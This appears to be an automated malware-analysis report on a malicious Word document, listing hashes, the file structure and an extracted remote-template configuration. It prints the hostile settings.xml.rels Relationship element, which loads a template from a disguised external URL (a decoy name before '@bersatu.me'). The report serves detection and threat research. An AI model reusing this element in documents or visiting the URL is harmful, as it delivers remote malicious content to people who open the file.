Malicious

1519613717060114b84b85def0e37774

MS Word Document | MD5: 1519613717060114b84b85def0e37774 | Size: 113.16 KB | application/msword

Office Document
Remote Template Injection
T1221
Moderately Suspicious Document
Corrupted

Characteristics
Hash
Hash Value
MD5
1519613717060114b84b85def0e37774
Sha1
366e202639b936ec6e1b3322fa6739217c44fcdd
Sha256
bf9a021187e7b7be90c3031504c48a471094e3d7560afbb2e91dcb3d102b7788
Sha384
7f21d47ce5c63c1fb61716e310de73fc2b68cd254be12bc9387786c3b2f1d778787ef68346e90f36f4105a49698479ee
Sha512
b8e968935764b4cf1422014e8e3aa42a65f63d216cc8200bdab9ace09dce78cefed6c43cf789fef43a5d063d6ed52f7ab6bf5e6e38b94487c726ce40fff16aeb
SSDeep
3072:TnczZP99mU9Q26qplFW/mPr9SrdwYwEWZ2gdYjyh:TnS9QU9fpPW/madwYwrWyh
TLSH
A3B302A0D01C74EDD504B5BDBED4E3A22FFE7182971706AE8985421A4AFF90FD718A1C
File Structure
1519613717060114b84b85def0e37774
Office Document
Remote Template Injection
T1221
Moderately Suspicious Document
Corrupted
Malicious
[Content_Types].xml
Xml
_rels
.rels
Xml
word
Malicious
_rels
Malicious
document.xml.rels
Xml
header2.xml.rels
Xml
footer2.xml.rels
Xml
settings.xml.rels
Xml
Remote Template Injection
T1221
Moderately Suspicious Document
Malicious
document.xml
Xml
footnotes.xml
Xml
footer2.xml
Xml
footer3.xml
Xml
header3.xml
Xml
endnotes.xml
Xml
header2.xml
Xml
media
image1.emf
image2.emf
embeddings
Malicious
Microsoft_Office_Excel_Worksheet1.xlsx
Office Document
[Content_Types].xml
Xml
_rels
.rels
Xml
xl
_rels
workbook.xml.rels
Xml
workbook.xml
Xml
sharedStrings.xml
Xml
worksheets
_rels
sheet1.xml.rels
Xml
sheet1.xml
Xml
theme
theme1.xml
Xml
styles.xml
Xml
printerSettings
printerSettings1.bin
customXml
itemProps2.xml
Xml
_rels
item3.xml.rels
Xml
item2.xml.rels
Xml
item1.xml.rels
Xml
item1.xml
Xml
itemProps1.xml
Xml
itemProps3.xml
Xml
item3.xml
Xml
item2.xml
Xml
docProps
thumbnail.wmf
core.xml
Xml
app.xml
Xml
custom.xml
Xml
Microsoft_Office_Excel_97-2003_Worksheet1.xls
Office Document
Corrupted
Malicious
Root Entry
Malicious
Ole
EPRINT
CompObj
ObjInfo
Workbook
Office Document
Corrupted
Malicious
[Repaired @0x0000568B]
Office Document
Corrupted
Malicious
SummaryInformation
DocumentSummaryInformation
[Repaired @0x0005B08B]
Office Document
Corrupted
Malicious
[Content_Types].xml
Xml
_rels
.rels
Xml
drs
shapexml.xml
Xml
downrev.xml
Xml
theme
theme1.xml
Xml
settings.xml
Xml
styles.xml
Xml
webSettings.xml
Xml
fontTable.xml
Xml
docProps
app.xml
Xml
core.xml
Xml
Malware Configuration - Remote Template
Config. Field | Value
Target | https://bestpeoplesassociatediwithbestthingswhoreallylovesgoodthingswithformebestter.docx@bersatu.me/DdMWqb
Path | settings.xml.rels
XPath | /Relationships/Relationship
Outer XML | <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://bestpeoplesassociatediwithbestthingswhoreallylovesgoodthingswithformebestter.docx@bersatu.me/DdMWqb" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" />

Artefacts
Name | Value
Remote Template - Highly Suspicious | https://bestpeoplesassociatediwithbestthingswhoreallylovesgoodthingswithformebestter.docx@bersatu.me/DdMWqb
